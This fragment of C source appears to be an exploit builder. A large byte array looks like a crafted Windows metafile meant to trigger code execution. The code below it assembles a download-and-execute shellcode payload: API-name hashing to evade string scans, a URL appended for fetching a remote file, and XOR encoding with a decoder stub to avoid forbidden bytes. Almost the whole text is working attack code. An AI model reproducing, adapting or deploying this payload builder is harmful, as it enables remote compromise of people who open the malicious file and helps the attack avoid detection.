    	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x02, 0x01, 0x01, 0x00, 0x18, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xDF, 0x01, 0xD2, 0x01, 0x0B, 0x00,
    	0x00, 0x00, 0x54, 0x52, 0x41, 0x46, 0x20, 0x3D, 0x20, 0x65, 0x65, 0x65, 0x65, 0x00, 0x0D, 0x00,
    	0x10, 0x00, 0x0F, 0x00, 0x0E, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x06, 0x00, 0x0D, 0x00, 0x0F, 0x00,
    	0x0E, 0x00, 0x0F, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
    	0x00, 0xAC, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0xD2, 0x00, 0x00, 0x94, 0x0A, 0xDF, 0x01,
    	0x5C, 0x02, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
    	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x22, 0x00,
    	0x00, 0x00, 0x32, 0x0A, 0xDF, 0x01, 0x63, 0x02, 0x12, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65,
    	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x0B, 0x00,
    	0x08, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00,
    	0x0C, 0x00, 0x05, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x09, 0x00,
    	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
    	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
    	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x18, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xF9, 0x01, 0xD2, 0x01,
    	0x0B, 0x00, 0x00, 0x00, 0x54, 0x52, 0x41, 0x49, 0x4C, 0x20, 0x3D, 0x20, 0x54, 0x4E, 0x46, 0x00,
    	0x0D, 0x00, 0x10, 0x00, 0x10, 0x00, 0x07, 0x00, 0x0F, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x06, 0x00,
    	0x73, 0x00, 0x0F, 0x00, 0x0E, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
    	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0xA7, 0x0A,
    	0xF9, 0x01, 0x57, 0x02, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
    	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
    	0x21, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xF9, 0x01, 0x5E, 0x02, 0x11, 0x00, 0x00, 0x00, 0x65, 0x65,
    	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00,
    	0x08, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00,
    	0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x06, 0x00,
    	0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
    	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x09, 0x00, 0x00,
    	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xF9, 0x01, 0xF8, 0x02,
    	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
    	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00,
    	0x32, 0x0A, 0xF9, 0x01, 0x00, 0x03, 0x08, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    	0x65, 0x65, 0x06, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x0B, 0x00,
    	0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
    	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
    	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x13, 0x02, 0xD2, 0x01,
    	0x06, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x06, 0x00, 0x05, 0x00, 0x0B, 0x00,
    	0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
    	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0xAD, 0x00, 0x00, 0x00, 0x32, 0x0A,
    	0x2C, 0x02, 0xD2, 0x01, 0x07, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x3D, 0x00,
    	0x0D, 0x00, 0x10, 0x00, 0x0F, 0x00, 0x0E, 0x00, 0x0E, 0x00, 0x06, 0x00, 0x0C, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00,
    	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
    	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0xD8, 0x02, 0x01,
    	0x01, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x32, 0x02, 0x03, 0x00, 0x00, 0x00,
    	0x54, 0x64, 0x54, 0x00, 0x0E, 0x00, 0x0C, 0x00, 0x0D, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
    	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0xA4, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
    	0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x59, 0x02, 0x01, 0x7D, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0xBA, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
    	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
    	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x61, 0x02, 0x08, 0x00,
    	0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x11, 0x00, 0x0A, 0x00, 0x0C, 0x00,
    	0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
    	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0D, 0x00,
    	0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0xBB, 0x02, 0x04, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65,
    	0x0B, 0x00, 0x10, 0x00, 0x0D, 0x00, 0x0E, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
    	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00,
    	0x32, 0x0A, 0x2C, 0x02, 0xF6, 0x02, 0x08, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    	0x65, 0x65, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0C, 0x00,
    	0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
    	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
    	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x43, 0x03,
    	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
    	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00,
    	0x32, 0x0A, 0x46, 0x02, 0xD2, 0x01, 0x09, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    	0x65, 0x65, 0x20, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x06, 0x00,
    	0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
    	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x32, 0x0A,
    	0x60, 0x02, 0xD2, 0x01, 0x04, 0x00, 0x00, 0x00, 0x7A, 0x56, 0x41, 0x44, 0x09, 0x00, 0x0F, 0x00,
    	0x0F, 0x00, 0x10, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
    	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02,
    	0x09, 0x02, 0x01, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
    	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0C, 0x3F,
    	0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x0E, 0x02, 0x03, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x00,
    	0x08, 0x00, 0x12, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x30, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
    	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A,
    	0x60, 0x02, 0x38, 0x02, 0x01, 0x00, 0x00, 0x00, 0x3D, 0x00, 0x0C, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
    	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
    	0x21, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x4A, 0x02, 0x11, 0x00, 0x00, 0x00, 0x65, 0x65,
    	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00,
    	0x0B, 0x00, 0x0B, 0x00, 0x0B, 0xAF, 0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00,
    	0x0A, 0x00, 0x0A, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00,
    	0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
    	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0xDD,
    	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0xF6, 0x02,
    	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
    	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00,
    	0x32, 0x0A, 0x60, 0xEB, 0xFD, 0x02, 0x06, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    	0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
    	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
    	0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x34, 0x03, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00,
    	0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
    	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
    	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x3B, 0x03,
    	0x07, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00, 0x0B, 0x00, 0x05, 0x00,
    	0x0C, 0x00, 0x0C, 0x4F, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
    	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
    	0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x7D, 0x03, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
    	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
    	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0xF7, 0x62, 0x00,
    	0x02, 0x01, 0x01, 0x00, 0x31, 0x00, 0x00, 0xC3, 0x32, 0x0A, 0x79, 0x02, 0xD2, 0x01, 0x1C, 0x00,
    	0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x0B, 0x00,
    	0x08, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x08, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00,
    	0x05, 0x00, 0x08, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x11, 0x00,
    	0x0A, 0x00, 0x08, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00,
    	0x0C, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2D, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x04, 0x00, 0x10, 0x00,
    	0x00, 0x00, 0xFB, 0x02, 0x10, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00,
    	0x00, 0xEE, 0x01, 0x02, 0x02, 0x22, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x00, 0xEE, 0x04, 0x00,
    	0x00, 0x00, 0x2D, 0x01, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x03, 0x00, 0x0F, 0x00,
    	0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x14, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x04, 0x00, 0x0C, 0x00,
    	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
    	0x26, 0x06, 0x0F, 0x00, 0x08, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00,
    	0x00, 0x00, 0x00, 0x00
    };
    
    
    // Output buffer for the generated payload. Make_ShellCode() copies the
    // machine code taken from ShellCode() here, then appends the API hash table
    // and the URL string. Capacity is fixed at 1024 bytes.
    unsigned char  sc[1024] = {0};
    // Number of bytes of sc[] in use; written by Make_ShellCode().
    unsigned int   Sc_len;
    
    // Forward declaration of the inline-asm routine that serves as the payload
    // template. Make_ShellCode() reads its bytes as data instead of calling it.
    void    ShellCode();
    
    // Get function hash
    // Compute the 32-bit hash of the NUL-terminated name c.
    // Per character: rotate the running value right by HASH_KEY bits, then add
    // the character. The payload's hash_loop performs the same two steps
    // (ror ebx, HASH_KEY / add ebx, edx), so a hash computed here matches the one
    // the payload derives from an export name at run time.
    // Analysis note: only these hashes are copied into sc[], not the API names,
    // so the payload carries no API name strings for a string scan to match on.
    // HASH_KEY is defined outside this view.
    static DWORD __stdcall GetHash ( char *c )
    {
       DWORD h = 0;                 // running hash, starts at zero
    
       while ( *c )                 // stop at the terminating NUL
       {
           __asm ror h, HASH_KEY    // rotate the accumulator in place
    
           // *c is a plain char; if char is signed on this compiler the value is
           // sign-extended before the add (the payload side uses movsx).
           h += *c++;
       }
       return( h );
    }
    
    // Assemble the final payload in sc[] / Sc_len for the download URL url1.
    // Steps, in order:
    //   1. hash every name in functions[] with GetHash();
    //   2. copy the bytes of ShellCode() that lie between two SEARCH_STR markers;
    //   3. append the hash table and the NUL-terminated URL;
    //   4. XOR-encode everything from offset DECODE_LEN onward with a one-byte
    //      key chosen so that no encoded byte is one of a fixed set of values;
    //   5. patch the length and the key into the decoder stub.
    // Calls exit(-1) when no key qualifies.
    // functions[], SEARCH_STR, SEARCH_LEN, MAX_SC_LEN, DECODE_LEN, ENC_KEY and the
    // *_OFFSET constants are defined outside this view.
    // NOTE(review): none of the memcpy() calls below checks the running length
    // against the 1024-byte size of sc[].
    void Make_ShellCode(char *url1)
    {
       unsigned char  *pSc_addr;            // cursor into the code of ShellCode()
       unsigned int   Enc_key=ENC_KEY;      // XOR key; replaced once a usable key is found
       unsigned long  dwHash[100];          // one hash per entry of functions[]
       unsigned int   dwHashSize;           // size of the hash table in bytes
       int i,j,k,l;
    
    
       // Hash every function name. The loop has no upper bound of its own; it
       // relies on functions[] ending with an empty string.
       //printf("[+] Get functions hash strings.\r\n");
       for (i=0;;i++)
       {
           if (functions[i][0] == '\x0') break;
    
           dwHash[i] = GetHash((char*)functions[i]);
           //printf("\t%.8X\t%s\n", dwHash[i], functions[i]);
       }
       dwHashSize = i*4;                    // 4 bytes per stored hash
    
    
       // Treat the compiled ShellCode() routine as a byte array.
       pSc_addr = (unsigned char *)ShellCode;
    
       // Find the first marker; if none is found within MAX_SC_LEN bytes, k ends
       // up equal to MAX_SC_LEN and the code continues regardless.
       for (k=0;k<MAX_SC_LEN;++k )
       {
           if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0)
           {
               break;
           }
       }
       pSc_addr+=(k+SEARCH_LEN);               // first byte after the opening marker
    
       // Find the second marker; its distance from the start is the code length.
       for (k=0;k<MAX_SC_LEN;++k)
       {
           if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) {
               break;
           }
       }
       Sc_len=k;                               // length of the code between the markers
    
